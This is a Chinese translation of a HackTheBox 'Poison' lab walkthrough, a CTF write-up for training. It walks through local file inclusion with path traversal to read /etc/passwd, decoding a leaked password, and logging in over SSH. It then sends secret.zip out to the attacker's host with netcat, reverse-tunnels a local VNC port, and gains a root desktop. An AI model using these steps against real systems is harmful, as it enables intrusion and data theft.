HackTheBox - Poison Writeup

来源:https://www.absolomb.com/2018-09-08-HackTheBox-Poison/

PoisionHackTheBox里面非常简单的一个CTF服务器,不过它确实包含了一些让有趣且独特东西。

初始

网络枚举

让我们依旧使用nmap进行快速扫描。

root@kali:~# nmap -sV 10.10.10.84

Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-24 12:27 CDT

Nmap scan report for 10.10.10.84

Host is up (0.052s latency).

Not shown: 998 closed ports

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)

80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)

Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

在浏览器中查看端口80的页面。

我们可以在Scriptname字段中依次检查这些文件名。当我们提交listfiles.php时,页面输出了以下内容:

请注意URL的形式,它调用这些文件的方式可能容易受到LFI的攻击。

我们先来看看pwdbackup.txt,因为这个文件看起来很有趣。

root@kali:~/htb/poison# curl http://10.10.10.84/browse.php?file=pwdbackup.txt

This password is secure, it's encoded atleast 13 times.. what could go wrong really..

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU

bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS

bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW

M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs

WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy

eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G

WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw

MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa

T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k

WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk

WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0

NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT

Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz

WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW

VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO

Ukd4RVdub3dPVU5uUFQwSwo=

编码了13次,好吧,让我们快速编写一个python脚本来快速解码,而不是手动一次次执行解码。

import base64

string **=**"""

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU

bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS

bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW

M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs

WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy

eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G

WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw

MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa

T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k

WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk

WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0

NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT

Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz

WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW

VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO

Ukd4RVdub3dPVU5uUFQwSwo= """

**def**** decode**(b64\_string, iterations):

    i **=** 0

    **while** i **\<** iterations:

        b64\_string **=** base64 **.** b64decode(b64\_string) **.** decode('utf-8')

        i **+=** 1

    **print** (b64\_string)

decode(string, 13)

测试脚本并运行:

root@kali:~/htb/poison# python3 decode.py
Charix!2#4%6&8(0

OK!我们得到了密码,但我们仍然需要知道用户名。 让我们测试一下是否存在LFI漏洞。

root@kali:~/htb/poison# curl http://10.10.10.84/browse.php?file=../../../etc/passwd

\<br /\>
\<b\>Warning\</b\>:  include(../../../etc/passwd): failed to open stream: No such file or directory in \<b\>/usr/local/www/apache24/data/browse.php\</b\> on line \<b\>2\</b\>\<br /\>
\<br /\>
\<b\>Warning\</b\>:  include(): Failed opening '../../../etc/passwd' for inclusion (include\_path='.:/usr/local/www/apache24/data') in \<b\>/usr/local/www/apache24/data/browse.php\</b\> on line \<b\>2\</b\>\<br /\>

我们在这里可以看到确实使用了include(),我们也看到了包含的路径,所以我们需要跳五层目录才能跳到根目录。

root@kali:~/htb/poison# curl http://10.10.10.84/browse.php?file=../../../../../etc/passwd
# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr$
#
root:\*:0:0:Charlie &:/root:/bin/csh
toor:\*:0:0:Bourne-again Superuser:/root:
daemon:\*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:\*:2:5:System &:/:/usr/sbin/nologin
bin:\*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:\*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:\*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:\*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:\*:8:8:News Subsystem:/:/usr/sbin/nologin
man:\*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:\*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:\*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:\*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:\*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:\*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:\*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
\_pflogd:\*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
\_dhcp:\*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:\*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:\*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:\*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:\*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
\_ypldap:\*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:\*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:\*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
\_tss:\*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:\*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:\*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:\*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:\*:1001:1001:charix:/home/charix:/bin/csh

我们看到有一个charix的用户名。 让我们用这个用户名和密码试试ssh

root@kali:~/htb/poison# ssh charix@10.10.10.84
Password for charix@Poison:
Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017
Welcome to FreeBSD!
Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories:   https://www.FreeBSD.org/security/
FreeBSD Handbook:      https://www.FreeBSD.org/handbook/
FreeBSD FAQ:           https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums:        https://forums.FreeBSD.org/
Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with:  pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.
Show the version of FreeBSD installed:  freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages:  man man
FreeBSD directory layout:      man hier
Edit /etc/motd to change this login announcement.
You can often get answers to your questions about FreeBSD by searching in the
FreeBSD mailing list archives at
        http://www.FreeBSD.org/search/search.html
charix@Poison:~ %

很好!

特权升级

查看主目录,我们看到一个可疑的zip文件。

charix@Poison:~ % ls -al
total 48
drwxr-x---  2 charix  charix   512 Mar 19 17:16 .
drwxr-xr-x  3 root    wheel    512 Mar 19 16:08 ..
-rw-r-----  1 charix  charix  1041 Mar 19 17:16 .cshrc
-rw-rw----  1 charix  charix     0 Mar 19 17:17 .history
-rw-r-----  1 charix  charix   254 Mar 19 16:08 .login
-rw-r-----  1 charix  charix   163 Mar 19 16:08 .login\_conf
-rw-r-----  1 charix  charix   379 Mar 19 16:08 .mail\_aliases
-rw-r-----  1 charix  charix   336 Mar 19 16:08 .mailrc
-rw-r-----  1 charix  charix   802 Mar 19 16:08 .profile
-rw-r-----  1 charix  charix   281 Mar 19 16:08 .rhosts
-rw-r-----  1 charix  charix   849 Mar 19 16:08 .shrc
-rw-r-----  1 root    charix   166 Mar 19 16:35 secret.zip
-rw-r-----  1 root    charix    33 Mar 19 16:11 user.txt

让我们用netcat将这个zip文件传到我们的本地机器上。

charix@Poison:~ % nc -w 2 10.10.14.8 443 \< secret.zip
root@kali:~/htb/poison# nc -lvnp 443 \> secret.zip
listening on [any] 443 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.84] 13787

这个zip文件受密码保护,但我们可以尝试使用charix用户的ssh密码来解压缩。竟然可以!

root@kali:~/htb/poison# unzip secret.zip
Archive:  secret.zip
[secret.zip] secret password:
 extracting: secret

检查文件格式,我们可以看到它应该是一个常规的ASCII文件。

root@kali:~/htb/poison# file secret
secret: Non-ISO extended-ASCII text, with no line terminators
root@kali:~/htb/poison# cat secret
[|Ֆz!

然而,文件内容是一些垃圾字符。 让我们再仔细了解一下这台服务器吧。 使用ps aux检查运行的进程后,我们看到以下几个有趣的内容。

root    529   0.0  0.9  23620  8996 v0- I    19:17     0:00.22 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geo
root    540   0.0  0.7  67220  7060 v0- I    19:17     0:00.07 xterm -geometry 80x24+10+10 -ls -title X Desktop

我们还看到一些监听在本地的端口。

charix@Poison:~ % netstat -an
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address          Foreign Address        (state)
tcp4       0      0 10.10.10.84.22         10.10.14.8.44976       ESTABLISHED
tcp4       0      0 127.0.0.1.25           \*.\*                    LISTEN
tcp4       0      0 \*.80                   \*.\*                    LISTEN
tcp6       0      0 \*.80                   \*.\*                    LISTEN
tcp4       0      0 \*.22                   \*.\*                    LISTEN
tcp6       0      0 \*.22                   \*.\*                    LISTEN
tcp4       0      0 127.0.0.1.5801         \*.\*                    LISTEN
tcp4       0      0 127.0.0.1.5901         \*.\*                    LISTEN
udp4       0      0 \*.514                  \*.\*
udp6       0      0 \*.514                  \*.\*

端口5801和5901通常是VNC服务使用,这与我们在进程列表中看到的正在运行的VNC会话相匹配。让我们把端口转发到我们的本地机器上,这样我们就可以访问了(确保你在本地机器上已经启动了SSH!)。

charix@Poison:~ % ssh -l root -R 5801:127.0.0.1:5901 10.10.14.8
root@10.10.14.8's password:
The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/\*/copyright.
Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@kali:~#

如果我们检查kali上的监听连接,我们会看到端口转发已经成功。

root@kali:~# netstat -ant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:\*               LISTEN
tcp        0      0 127.0.0.1:5801          0.0.0.0:\*               LISTEN
tcp        0      0 10.10.14.8:44976        10.10.10.84:22          ESTABLISHED
tcp        0      0 10.10.14.8:22           10.10.10.84:54672       ESTABLISHED
tcp6       0      0 :::22                   :::\*                    LISTEN
tcp6       0      0 ::1:5801                :::\*                    LISTEN

Vncviewer 支持-passwd选项,所以我们可以将passwd文件传递给它来进行身份验证,因此我们可能会传递我们之前拿到的那个secret文件进行身份验证。

root@kali:~/htb/poison# vncviewer -h
TightVNC Viewer version 1.3.9
Usage: vncviewer [\<OPTIONS\>] [\<HOST\>][:\<DISPLAY#\>]
       vncviewer [\<OPTIONS\>] [\<HOST\>][::\<PORT#\>]
       vncviewer [\<OPTIONS\>] -listen [\<DISPLAY#\>]
       vncviewer -help
\<OPTIONS\> are standard Xt options, or:
        -via \<GATEWAY\>
        -shared (set by default)
        -noshared
        -viewonly
        -fullscreen
        -noraiseonbeep
        -passwd \<PASSWD-FILENAME\> (standard VNC authentication)
~

~

root@kali:~/htb/poison# vncviewer -passwd secret 127.0.0.1:5801

Connected to RFB server, using protocol version 3.8

Enabling TightVNC protocol extensions

Performing standard VNC authentication

Authentication successful

Desktop name "root's X desktop (Poison:1)"

没错,搞定了!

原文发布于微信公众号 - 安恒网络空间安全讲武堂(cyberslab)

原文发表时间:2018-11-22

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏运维前线

kvm基础使用及Virt-tools工具使用

kvm基础使用 查看虚拟机状态 [root@sh-kvm-1 ~]# virsh list --all Id Name ...

4338
来自专栏用户2442861的专栏

ubuntu16安装nginx

https://www.digitalocean.com/community/tutorials/how-to-install-nginx-on-ubuntu-...

1732
来自专栏向治洪

ActivityManagerService启动过程分析

之前讲Android的View的绘制原理和流程的时候,讲到过在Android调用setContentView之后,Android调用了一个prepreTravl...

2658
来自专栏Kubernetes

深度剖析Kubernetes动态准入控制之Admission Webhooks

Author: xidianwangtao@gmail.com Admission Controll的最佳配置 这部分内容,请参考我的上一篇博文深度剖析K...

5927
来自专栏老码农专栏

基于playframework v1构建一个新的Java web应用框架

1132
来自专栏晓晨的专栏

浏览器启动外部软件

3494
来自专栏JMCui

Docker 系列七(Duubo 微服务部署实践).

    之前我们公司部署服务,就是大家都懂的那一套(安装JDK、Tomcat —> 编译好文件或者打war包上传 —> 启动Tomcat),这种部署方式一直持续...

2555
来自专栏Kubernetes

Kubernetes Nginx Ingress Controller源码分析之创建篇

main controllers/nginx/pkg/cmd/controller/main.go:29 func main() { // start a ...

8517
来自专栏IT进修之路

原 荐 SpringBoot整合mybati

2004
来自专栏battcn

一起来学Spring Cloud(F版) | 第二篇:Ribbon软负载

Ribbon 是 Netflix 开源的基于 HTTP 和 TCP 的客户端负载均衡器框架,目前也已被 SpringCloud 团队集成在 spring-clo...

1363

扫码关注云+社区

领取腾讯云代金券